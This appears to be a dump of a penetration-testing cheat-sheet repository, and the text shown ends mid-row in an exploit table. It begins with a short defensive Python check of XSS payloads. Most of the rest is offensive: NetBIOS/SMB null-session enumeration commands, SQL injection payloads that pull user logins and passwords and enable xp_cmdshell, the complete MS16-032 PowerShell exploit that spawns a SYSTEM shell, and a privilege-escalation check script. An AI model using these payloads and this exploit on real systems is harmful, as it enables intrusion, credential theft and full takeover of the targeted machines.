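Every payload in the XSS section above works for the same reason: user input is written into a page without encoding for the context it lands in, so `"` closes an attribute and `<` opens a tag. The following is an added example, not part of the cheat sheet: a tiny template rendered both ways, and a check built on the standard library's `html.parser` that reports any tag or attribute the page did not contain before the input was inserted. The template, payload list and check are this example's own constructions.

```python
"""Reflected XSS: unencoded vs. HTML-encoded output, verified with a parser.

Added example (not part of the cheat sheet). The template and the check are
ours; the payloads are the ones listed in the XSS section.
"""
import html
from html.parser import HTMLParser

# Payloads from the XSS section, landing in a text node and in an attribute value
PAYLOADS = [
    "<script>alert('Found')</script>",
    '"><script>alert(Found)</script>">',
    "\" onload=\"alert('XSS')",
    "<img src='bla' onerror=alert(\"XSS\")>",
]


def render_unsafe(name):
    """The bug: the raw value is pasted into HTML text and into an attribute."""
    return f'<p>Hello {name}</p><input value="{name}">'


def render_safe(name):
    """The fix for these two contexts: encode & < > " ' before insertion."""
    safe = html.escape(name, quote=True)
    return f'<p>Hello {safe}</p><input value="{safe}">'


class _MarkupAudit(HTMLParser):
    """Collects every start tag and attribute name the parser sees."""
    def __init__(self):
        super().__init__()
        self.tags, self.attrs = [], []

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        self.attrs.extend(name for name, _ in attrs)


def unexpected_markup(rendered):
    """Return tags/attributes beyond the template's own <p>, <input value=...>.
    An empty list means the input stayed data; anything else means it
    became markup, i.e. the injection succeeded."""
    parser = _MarkupAudit()
    parser.feed(rendered)
    extra_tags = [t for t in parser.tags if t not in ("p", "input")]
    extra_attrs = [a for a in parser.attrs if a != "value"]
    return extra_tags + extra_attrs


def audit_all(payloads=PAYLOADS):
    """Map each payload to (what leaked unencoded, what leaked encoded)."""
    return {p: (unexpected_markup(render_unsafe(p)),
                unexpected_markup(render_safe(p))) for p in payloads}


if __name__ == "__main__":
    for payload, (unsafe, safe) in audit_all().items():
        print(f"{payload!r}\n  unencoded -> {unsafe}\n  encoded   -> {safe}")
```

Note which payload leaks what: the `" onload="...` line never creates a tag, it adds an `onload` attribute by closing the `value` quote, which is why a filter that only strips `<script>` misses it. `html.escape` covers text and quoted-attribute contexts only; a value placed inside a `<script>` block or a URL needs that context's own encoder.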
/CheatSheets/NetBIOS/readme.md: -------------------------------------------------------------------------------- 1 | # NetBIOS Recon & Enumaration 2 | 3 | ## Using WINDOWS Tools 4 | 5 | ### nbtstat 6 | 7 | #### How to see the status of a server 8 | 9 | `nbtstat -a <Target_ip>` 10 | 11 | `nbtstat -a 10.10.1.100` 12 | 13 | #### Whats is available there 14 | 15 | `net view Target_IP` 16 | 17 | `net view 10.10.1.100` 18 | 19 | #### Explore it 20 | 21 | net use < A_drive > \\Target_IP\SHARE_NAME 22 | 23 | `net use K: \\10.10.1.100\Dados` 24 | 25 | ### nat 26 | 27 | nat < -o output file > < -u userlist.txt > < -p passlist.txt> < IP_Address/RANGE > 28 | 29 | `nat -o netbios_output.txt -u usernames.txt -p rockyou.txt 10.10.1.100` 30 | 31 | ### winfo 32 | 33 | #### NUll Session 34 | 35 | `winfo < IP_Address > (-v verbose) (-n Null Session)` 36 | 37 | #### Enumarate 38 | 39 | `winfo < IP_Address> -u` 40 | 41 | ## Using UNIX Tools 42 | 43 | ### nbtscan 44 | 45 | `nbtscan -r 172.16.1.0/24` 46 | 47 | ### smblcient 48 | 49 | NUll Session 50 | 51 | `smbclient -L //172.168.1.5 -N` 52 | 53 | No Password but with User 54 | 55 | `smbclient -L //172.168.1.5 -N -U Administrator` 56 | 57 | `smbclient //172.168.1.5/path -N` 58 | 59 | `smbclient //172.168.1.5/path -U DOMAIN\\administrator` 60 | 61 | ### rpcclient 62 | 63 | `rpcclient -U "" -N 172.16.1.5` 64 | 65 | `rpcclient -u "Administrator" -N 17.16.1.5` 66 | 67 | Commands 68 | enumdomusers 69 | netshareenum 70 | netshareenumall 71 | querydominfo 72 | lookupname root 73 | queryuser john 74 | 75 | ### Enum4linux 76 | 77 | All info 78 | 79 | `enum4linux -a 172.16.1.5` 80 | 81 | With User and blank pass 82 | 83 | `enum4linux -a -u administrator -p "" 172.16.1.5` 84 | 85 | ### NMAP NSE 86 | 87 | ### SMB OS Discovery 88 | 89 | `nmap 172.20.10.5 --script smb-os-discovery` 90 | 91 | `nmap -v --script=smb-enum-shares 172.166.1.5` 92 | 93 | ### show SMB scripts and 94 | 95 | `ls /usr/share/nmap/scripts | grep smb ` 96 | 
-------------------------------------------------------------------------------- /CheatSheets/SQLI/barehands/readme.md: --------------------------------------------------------------------------------
# SQLI tricks

## GET

### Union-Based

### Simple test

Add a single quote `'` to the parameter.

Example: `http://192.168.1.104/Less-1/?id=5'`

### Fuzzing

Sort by column position to find the number of columns:

`http://192.168.1.104/Less-1/?id=-1 order by 1`

`http://192.168.1.104/Less-1/?id=-1 order by 2`

`http://192.168.1.104/Less-1/?id=-1 order by 3`

(keep increasing the number until the query starts returning an error; the last value that worked is the column count)

---

### Finding which column is injectable

**mysql**
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, 3` (use the same number of columns you found in the previous step)

**postgresql**
`http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, NULL` (use the same number of columns you found in the previous step)

One of the columns will be printed on the page with its respective number; that is the column to put your expressions in.

---

#### Finding version

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, version()` **mysql**
`http://192.168.1.104/Less-1/?id=-1 union select NULL, NULL, version()` **postgres**

#### Finding database name

`http://192.168.1.104/Less-1/?id=-1 union select 1,2, database()` **mysql**

`http://192.168.1.104/Less-1/?id=-1 union select NULL,NULL, current_database()` **postgres**

#### Finding the current user

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, current_user()` **mysql**

#### Finding databases

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, schema_name from information_schema.schemata` **mysql**

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, datname from pg_database` **postgres**

#### Finding table names from a database

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_schema="database_name"` **mysql**

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, table_name from information_schema.tables where table_catalog='database_name'` **postgres**

#### Finding column names from a table

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_schema="database_name" and table_name="tablename"` **mysql**

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, column_name from information_schema.columns where table_catalog='database_name' and table_name='tablename'` **postgres**

#### Concatenate

Example:

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login from users;`
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, password from users;`

In one query:

`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, concat(login,':',password) from users;` **mysql**
`http://192.168.1.104/Less-1/?id=-1 union select 1, 2, login||':'||password from users;` **postgres**

### Error Based SQLI (USUALLY MS-SQL)

#### Current user

`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(user_name() as varchar(4096)))--`

#### DBMS version

`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(@@version as varchar(4096)))--`

#### Database name

`http://192.168.1.104/Less-1/?id=-1 or db_name(0)=0 --`

#### Tables from a database

`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U')--`

---

`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(name as varchar(4096)) FROM dbname..sysobjects where xtype='U' AND name NOT IN ('previouslyFoundTable',...))--`

#### Columns within a table

`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename')--`

> remember to change **dbname** and **tablename** according to the situation
> after each iteration a new column name will be found; add it to **previously found column name**, comma separated, as in the next sample

`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(dbname..syscolumns.name as varchar(4096)) FROM dbname..syscolumns, dbname..sysobjects WHERE dbname..syscolumns.id=dbname..sysobjects.id AND dbname..sysobjects.name = 'tablename' AND dbname..syscolumns.name NOT IN('previously found column name', ...))--`

#### Actual data

`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename)--`

> after each iteration a new row value will be found; add it to **previously found row data**, comma separated, as in the next sample

`http://192.168.1.104/Less-1/?id=-1 or 1 in (SELECT TOP 1 CAST(columnName as varchar(4096)) FROM tablename WHERE columnName NOT IN('previously found row data', ...))--`

#### Shell commands

`EXEC master..xp_cmdshell <command>`

> you need to be the 'sa' user (or a member of the sysadmin role)

#### Enabling shell commands

`EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;`

-------------------------------------------------------------------------------- /CheatSheets/windows/priv_esc/Invoke-MS16-032.ps1: --------------------------------------------------------------------------------
function Invoke-MS16-032 {
Add-Type -TypeDefinition @"
using System; 4 | using System.Diagnostics; 5 | using System.Runtime.InteropServices; 6 | using System.Security.Principal; 7 | 8 | [StructLayout(LayoutKind.Sequential)] 9 | public struct PROCESS_INFORMATION 10 | { 11 | public IntPtr hProcess; 12 | public IntPtr hThread; 13 | public int dwProcessId; 14 | public int dwThreadId; 15 | } 16 | 17 | [StructLayout(LayoutKind.Sequential, CharSet=CharSet.Unicode)] 18 | public struct STARTUPINFO 19 | { 20 | public Int32 cb; 21 | public string lpReserved; 22 | public string lpDesktop; 23 | public string lpTitle; 24 | public Int32 dwX; 25 | public Int32 dwY; 26 | public Int32 dwXSize; 27 | public Int32 dwYSize; 28 | public Int32 dwXCountChars; 29 | public Int32 dwYCountChars; 30 | public Int32 dwFillAttribute; 31 | public Int32 dwFlags; 32 | public Int16 wShowWindow; 33 | public Int16 cbReserved2; 34 | public IntPtr lpReserved2; 35 | public IntPtr hStdInput; 36 | public IntPtr hStdOutput; 37 | public IntPtr hStdError; 38 | } 39 | 40 | [StructLayout(LayoutKind.Sequential)] 41 | public struct SQOS 42 | { 43 | public int Length; 44 | public int ImpersonationLevel; 45 | public int ContextTrackingMode; 46 | public bool EffectiveOnly; 47 | } 48 | 49 | public static class Advapi32 50 | { 51 | [DllImport("advapi32.dll", SetLastError=true, CharSet=CharSet.Unicode)] 52 | public static extern bool CreateProcessWithLogonW( 53 | String userName, 54 | String domain, 55 | String password, 56 | int logonFlags, 57 | String applicationName, 58 | String commandLine, 59 | int creationFlags, 60 | int environment, 61 | String currentDirectory, 62 | ref STARTUPINFO startupInfo, 63 | out PROCESS_INFORMATION processInformation); 64 | 65 | [DllImport("advapi32.dll", SetLastError=true)] 66 | public static extern bool SetThreadToken( 67 | ref IntPtr Thread, 68 | IntPtr Token); 69 | 70 | [DllImport("advapi32.dll", SetLastError=true)] 71 | public static extern bool OpenThreadToken( 72 | IntPtr ThreadHandle, 73 | int DesiredAccess, 74 | bool OpenAsSelf, 75 | 
out IntPtr TokenHandle); 76 | 77 | [DllImport("advapi32.dll", SetLastError=true)] 78 | public static extern bool OpenProcessToken( 79 | IntPtr ProcessHandle, 80 | int DesiredAccess, 81 | ref IntPtr TokenHandle); 82 | 83 | [DllImport("advapi32.dll", SetLastError=true)] 84 | public extern static bool DuplicateToken( 85 | IntPtr ExistingTokenHandle, 86 | int SECURITY_IMPERSONATION_LEVEL, 87 | ref IntPtr DuplicateTokenHandle); 88 | } 89 | 90 | public static class Kernel32 91 | { 92 | [DllImport("kernel32.dll")] 93 | public static extern uint GetLastError(); 94 | 95 | [DllImport("kernel32.dll", SetLastError=true)] 96 | public static extern IntPtr GetCurrentProcess(); 97 | 98 | [DllImport("kernel32.dll", SetLastError=true)] 99 | public static extern IntPtr GetCurrentThread(); 100 | 101 | [DllImport("kernel32.dll", SetLastError=true)] 102 | public static extern int GetThreadId(IntPtr hThread); 103 | 104 | [DllImport("kernel32.dll", SetLastError = true)] 105 | public static extern int GetProcessIdOfThread(IntPtr handle); 106 | 107 | [DllImport("kernel32.dll",SetLastError=true)] 108 | public static extern int SuspendThread(IntPtr hThread); 109 | 110 | [DllImport("kernel32.dll",SetLastError=true)] 111 | public static extern int ResumeThread(IntPtr hThread); 112 | 113 | [DllImport("kernel32.dll", SetLastError=true)] 114 | public static extern bool TerminateProcess( 115 | IntPtr hProcess, 116 | uint uExitCode); 117 | 118 | [DllImport("kernel32.dll", SetLastError=true)] 119 | public static extern bool CloseHandle(IntPtr hObject); 120 | 121 | [DllImport("kernel32.dll", SetLastError=true)] 122 | public static extern bool DuplicateHandle( 123 | IntPtr hSourceProcessHandle, 124 | IntPtr hSourceHandle, 125 | IntPtr hTargetProcessHandle, 126 | ref IntPtr lpTargetHandle, 127 | int dwDesiredAccess, 128 | bool bInheritHandle, 129 | int dwOptions); 130 | } 131 | 132 | public static class Ntdll 133 | { 134 | [DllImport("ntdll.dll", SetLastError=true)] 135 | public static extern int 
NtImpersonateThread( 136 | IntPtr ThreadHandle, 137 | IntPtr ThreadToImpersonate, 138 | ref SQOS SecurityQualityOfService); 139 | } 140 | "@ 141 | 142 | function Get-ThreadHandle { 143 | # StartupInfo Struct 144 | $StartupInfo = New-Object STARTUPINFO 145 | $StartupInfo.dwFlags = 0x00000100 # STARTF_USESTDHANDLES 146 | $StartupInfo.hStdInput = [Kernel32]::GetCurrentThread() 147 | $StartupInfo.hStdOutput = [Kernel32]::GetCurrentThread() 148 | $StartupInfo.hStdError = [Kernel32]::GetCurrentThread() 149 | $StartupInfo.cb = [System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size 150 | 151 | # ProcessInfo Struct 152 | $ProcessInfo = New-Object PROCESS_INFORMATION 153 | 154 | # CreateProcessWithLogonW --> lpCurrentDirectory 155 | $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName 156 | 157 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 158 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 159 | "user", "domain", "pass", 160 | 0x00000002, "C:\Windows\System32\cmd.exe", "", 161 | 0x00000004, $null, $GetCurrentPath, 162 | [ref]$StartupInfo, [ref]$ProcessInfo) 163 | 164 | # Duplicate handle into current process -> DUPLICATE_SAME_ACCESS 165 | $lpTargetHandle = [IntPtr]::Zero 166 | $CallResult = [Kernel32]::DuplicateHandle( 167 | $ProcessInfo.hProcess, 0x4, 168 | [Kernel32]::GetCurrentProcess(), 169 | [ref]$lpTargetHandle, 0, $false, 170 | 0x00000002) 171 | 172 | # Clean up suspended process 173 | $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) 174 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) 175 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) 176 | 177 | $lpTargetHandle 178 | } 179 | 180 | function Get-SystemToken { 181 | echo "`n[?] Thread belongs to: $($(Get-Process -PID $([Kernel32]::GetProcessIdOfThread($hThread))).ProcessName)" 182 | 183 | $CallResult = [Kernel32]::SuspendThread($hThread) 184 | if ($CallResult -ne 0) { 185 | echo "[!] $hThread is a bad thread, exiting.." 
186 | Return 187 | } echo "[+] Thread suspended" 188 | 189 | echo "[>] Wiping current impersonation token" 190 | $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, [IntPtr]::Zero) 191 | if (!$CallResult) { 192 | echo "[!] SetThreadToken failed, exiting.." 193 | $CallResult = [Kernel32]::ResumeThread($hThread) 194 | echo "[+] Thread resumed!" 195 | Return 196 | } 197 | 198 | echo "[>] Building SYSTEM impersonation token" 199 | # SecurityQualityOfService struct 200 | $SQOS = New-Object SQOS 201 | $SQOS.ImpersonationLevel = 2 #SecurityImpersonation 202 | $SQOS.Length = [System.Runtime.InteropServices.Marshal]::SizeOf($SQOS) 203 | # Undocumented API's, I like your style Microsoft ;) 204 | $CallResult = [Ntdll]::NtImpersonateThread($hThread, $hThread, [ref]$sqos) 205 | if ($CallResult -ne 0) { 206 | echo "[!] NtImpersonateThread failed, exiting.." 207 | $CallResult = [Kernel32]::ResumeThread($hThread) 208 | echo "[+] Thread resumed!" 209 | Return 210 | } 211 | 212 | # Null $SysTokenHandle 213 | $script:SysTokenHandle = [IntPtr]::Zero 214 | 215 | # 0x0006 --> TOKEN_DUPLICATE -bor TOKEN_IMPERSONATE 216 | $CallResult = [Advapi32]::OpenThreadToken($hThread, 0x0006, $false, [ref]$SysTokenHandle) 217 | if (!$CallResult) { 218 | echo "[!] OpenThreadToken failed, exiting.." 219 | $CallResult = [Kernel32]::ResumeThread($hThread) 220 | echo "[+] Thread resumed!" 221 | Return 222 | } 223 | 224 | echo "[?] Success, open SYSTEM token handle: $SysTokenHandle" 225 | echo "[+] Resuming thread.." 226 | $CallResult = [Kernel32]::ResumeThread($hThread) 227 | } 228 | 229 | # main() <--- ;) 230 | $ms16032 = @" 231 | __ __ ___ ___ ___ ___ ___ ___ 232 | | V | _|_ | | _|___| |_ |_ | 233 | | |_ |_| |_| . |___| | |_ | _| 234 | |_|_|_|___|_____|___| |___|___|___| 235 | 236 | [by Jens Lindström ] 237 | "@ 238 | 239 | $ms16032 240 | 241 | # Check logical processor count, race condition requires 2+ 242 | echo "`n[?] 
Operating system core count: $([System.Environment]::ProcessorCount)" 243 | if ($([System.Environment]::ProcessorCount) -lt 2) { 244 | echo "[!] Race condition requires at least 2 CPU cores, exiting!`n" 245 | Return 246 | } 247 | 248 | echo "[>] Duplicating CreateProcessWithLogonW handle" 249 | $hThread = Get-ThreadHandle 250 | 251 | # If no thread handle is captured, the box is patched 252 | if ($hThread -eq 0) { 253 | echo "[!] No valid thread handle was captured, exiting!`n" 254 | Return 255 | } else { 256 | echo "[?] Done, using thread handle: $hThread" 257 | } echo "`n[*] Sniffing out privileged impersonation token.." 258 | 259 | # Get handle to SYSTEM access token 260 | Get-SystemToken 261 | 262 | # If we fail a check in Get-SystemToken, exit 263 | if ($SysTokenHandle -eq 0) { 264 | Return 265 | } 266 | 267 | echo "`n[*] Sniffing out SYSTEM shell.." 268 | echo "`n[>] Duplicating SYSTEM token" 269 | $hDuplicateTokenHandle = [IntPtr]::Zero 270 | $CallResult = [Advapi32]::DuplicateToken($SysTokenHandle, 2, [ref]$hDuplicateTokenHandle) 271 | 272 | # Simple PS runspace definition 273 | echo "[>] Starting token race" 274 | $Runspace = [runspacefactory]::CreateRunspace() 275 | $StartTokenRace = [powershell]::Create() 276 | $StartTokenRace.runspace = $Runspace 277 | $Runspace.Open() 278 | [void]$StartTokenRace.AddScript({ 279 | Param ($hThread, $hDuplicateTokenHandle) 280 | while ($true) { 281 | $CallResult = [Advapi32]::SetThreadToken([ref]$hThread, $hDuplicateTokenHandle) 282 | } 283 | }).AddArgument($hThread).AddArgument($hDuplicateTokenHandle) 284 | $AscObj = $StartTokenRace.BeginInvoke() 285 | 286 | echo "[>] Starting process race" 287 | # Adding a timeout (10 seconds) here to safeguard from edge-cases 288 | $SafeGuard = [diagnostics.stopwatch]::StartNew() 289 | while ($SafeGuard.ElapsedMilliseconds -lt 10000) { 290 | 291 | # StartupInfo Struct 292 | $StartupInfo = New-Object STARTUPINFO 293 | $StartupInfo.cb = 
[System.Runtime.InteropServices.Marshal]::SizeOf($StartupInfo) # Struct Size 294 | 295 | # ProcessInfo Struct 296 | $ProcessInfo = New-Object PROCESS_INFORMATION 297 | 298 | # CreateProcessWithLogonW --> lpCurrentDirectory 299 | $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName 300 | 301 | # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED 302 | $CallResult = [Advapi32]::CreateProcessWithLogonW( 303 | "user", "domain", "pass", 304 | 0x00000002, "C:\Windows\System32\cmd.exe", "", 305 | 0x00000004, $null, $GetCurrentPath, 306 | [ref]$StartupInfo, [ref]$ProcessInfo) 307 | 308 | #--- 309 | # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop. 310 | #--- 311 | # Missing this check used to cause the exploit to fail sometimes. 312 | # If CreateProcessWithLogon fails OpenProcessToken won't succeed 313 | # but we obviously don't have a SYSTEM shell :'( . Should be 100% 314 | # reliable now! 315 | #--- 316 | if (!$CallResult) { 317 | continue 318 | } 319 | 320 | $hTokenHandle = [IntPtr]::Zero 321 | $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle) 322 | # If we can't open the process token it's a SYSTEM shell! 323 | if (!$CallResult) { 324 | echo "[!] Holy Handle Leak Potato, we have a SYSTEM shell !!!!!!`n" 325 | echo "[!] 
637 fuck3d w1nd0w5 `n" 326 | $CallResult = [Kernel32]::ResumeThread($ProcessInfo.hThread) 327 | $StartTokenRace.Stop() 328 | $SafeGuard.Stop() 329 | Return 330 | } 331 | 332 | # Clean up suspended process 333 | $CallResult = [Kernel32]::TerminateProcess($ProcessInfo.hProcess, 1) 334 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hProcess) 335 | $CallResult = [Kernel32]::CloseHandle($ProcessInfo.hThread) 336 | 337 | } 338 | 339 | # Kill runspace & stopwatch if edge-case 340 | $StartTokenRace.Stop() 341 | $SafeGuard.Stop() 342 | } -------------------------------------------------------------------------------- /CheatSheets/windows/priv_esc/WinPrivCheck.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | 3 | rem #---------------------------------------------------------------------------------# 4 | rem # Name = Windows Privilege Escalation Check v1.0 # 5 | rem # Reference = http://www.fuzzysecurity.com/tutorials/16.html # 6 | rem # Author = @ihack4falafel # 7 | rem # Date = 9/18/2017 # 8 | rem # Tested On = Windows XP SP3 - Professional # 9 | rem # Windows 7 SP1 - Entrprise # 10 | rem # Windows 10 - Professional # 11 | rem # Usage = WinPrivCheck.bat # 12 | rem # Requirements = accesschk.exe(old version) - sysinternals # 13 | rem #---------------------------------------------------------------------------------# 14 | 15 | 16 | @echo off 17 | rem Used rem instead of echo for cleaner output. 
18 | @echo on 19 | 20 | rem #----------# 21 | rem # Hostname # 22 | rem #----------# 23 | 24 | @echo off 25 | 26 | hostname 27 | 28 | @echo on 29 | 30 | rem #----------# 31 | rem # Username # 32 | rem #----------# 33 | 34 | @echo off 35 | 36 | echo %username% 2>NUL 37 | whoami 2>NUL 38 | echo %userprofile% 2>NUL 39 | 40 | @echo on 41 | 42 | rem #-----------# 43 | rem # OS Verion # 44 | rem #-----------# 45 | 46 | @echo off 47 | 48 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type" 49 | 50 | @echo on 51 | 52 | rem #--------------------# 53 | rem # Installed Software # 54 | rem #--------------------# 55 | 56 | @echo off 57 | 58 | wmic product get Name, Version 59 | 60 | @echo on 61 | 62 | rem #-----------------# 63 | rem # Available Users # 64 | rem #-----------------# 65 | 66 | @echo off 67 | 68 | net users 69 | 70 | @echo on 71 | 72 | rem #----------------# 73 | rem # Network Config # 74 | rem #----------------# 75 | 76 | @echo off 77 | 78 | ipconfig /all 79 | 80 | @echo on 81 | 82 | rem #--------------# 83 | rem # Route Config # 84 | rem #--------------# 85 | 86 | @echo off 87 | 88 | route print 89 | 90 | @echo on 91 | 92 | rem #-----------# 93 | rem # ARP Cache # 94 | rem #-----------# 95 | 96 | @echo off 97 | 98 | arp -a 99 | 100 | @echo on 101 | 102 | rem #---------------------# 103 | rem # Network Connections # 104 | rem #---------------------# 105 | 106 | @echo off 107 | 108 | netstat -ano 109 | 110 | @echo on 111 | 112 | rem #-------------------# 113 | rem # Firewall Settings # 114 | rem #-------------------# 115 | 116 | @echo off 117 | 118 | netsh firewall show state 119 | netsh firewall show config 120 | 121 | @echo on 122 | 123 | rem #------------------# 124 | rem # Running Services # 125 | rem #------------------# 126 | 127 | @echo off 128 | 129 | net start 130 | 131 | @echo on 132 | 133 | rem #------------------------# 134 | rem # Local PrivEsc Exploits # 135 | rem #------------------------# 136 | 137 | @echo off 138 | 139 | rem 
Given this script is for all versions of Windows, I'd reference the results with the below matrix to avoid false postives. 140 | 141 | 142 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 143 | rem # Exploits Index | 2K | XP | 2K3 | 2K8 | Vista | 7 | Title | 144 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 145 | rem # KB2592799 | MS11-080 | X | SP3 | SP3 | X | X | X | afd.sys - Local privilege Escalation | 146 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 147 | rem # KB3143141 | MS16-032 | X | X | X | SP1/2 | SP2 | SP1 | Secondary Logon - Local privilege Escalation | 148 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 149 | rem # KB2393802 | MS11-011 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | WmiTraceMessageVa - Local privilege Escalation | 150 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 151 | rem # KB982799 | MS10-059 | X | X | X | ALL | ALL | SP0 | Chimichurri - Local privilege Escalation | 152 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 153 | rem # KB979683 | MS10-021 | SP4 | SP2/3 | SP2 | SP2 | SP0/1/2 | SP0 | Windows Kernel - Local privilege Escalation | 154 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 155 | rem # KB2305420 | MS10-092 | X | X | X | SP0/1/2 | SP1/2 | SP0 | Task Scheduler - Local privilege Escalation | 156 | rem 
#-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 157 | rem # KB981957 | MS10-073 | X | SP2/3 | SP2 | SP2 | SP1/2 | SP0 | Keyboard Layout - Local privilege Escalation | 158 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 159 | rem # KB4013081 | MS17-017 | X | X | X | SP2 | SP2 | SP1 | Registry Hive Loading - Local privilege Escalation | 160 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 161 | rem # KB977165 | MS10-015 | ALL | ALL | ALL | ALL | ALL | ALL | User Mode to Ring - Local privilege Escalation | 162 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 163 | rem # KB941693 | MS08-025 | SP4 | SP2 | SP1/2 | SP0 | SP0/1 | X | win32k.sys - Local privilege Escalation | 164 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 165 | rem # KB920958 | MS06-049 | SP4 | X | X | X | X | X | ZwQuerySysInfo - Local privilege Escalation | 166 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 167 | rem # KB914389 | MS06-030 | ALL | SP2 | X | X | X | X | Mrxsmb.sys - Local privilege Escalation | 168 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 169 | rem # KB908523 | MS05-055 | SP4 | X | X | X | X | X | APC Data-Free - Local privilege Escalation | 170 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 171 | rem # KB890859 | MS05-018 | SP3/4 | SP1/2 | X | X | X | X | CSRSS - Local 
privilege Escalation | 172 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 173 | rem # KB842526 | MS04-019 | SP2/3/4 | X | X | X | X | X | Utility Manager - Local privilege Escalation | 174 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 175 | rem # KB835732 | MS04-011 | SP2/3/4 | SP0/1 | X | X | X | X | LSASS service BoF - Remote Code Execution | 176 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 177 | rem # KB841872 | MS04-020 | SP4 | X | X | X | X | X | POSIX - Local Privilege Escalation | 178 | rem #----------------------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 179 | rem # KB2975684 | MS14-040 | X | X | SP2 | SP2 | SP2 | SP1 | afd.sys Dangling Pointer - Local Privilege Escalation | 180 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 181 | rem # KB3136041 | MS16-016 | X | X | X | SP1/2 | SP2 | SP1 | WebDAV to Address - Local Privilege Escalation | 182 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 183 | rem # KB3057191 | MS15-051 | X | X | SP2 | SP2 | SP2 | SP1 | win32k.sys - Local Privilege Escalation | 184 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 185 | rem # KB2989935 | MS14-070 | X | X | SP2 | X | X | X | TCP/IP - Local Privilege Escalation | 186 | rem #-----------#----------#---------#-------#-------#---------#---------#-----#-------------------------------------------------------# 187 | rem # KB2503665 | MS11-046 | X | SP3 | SP2 | SP1/2 | SP1/2 
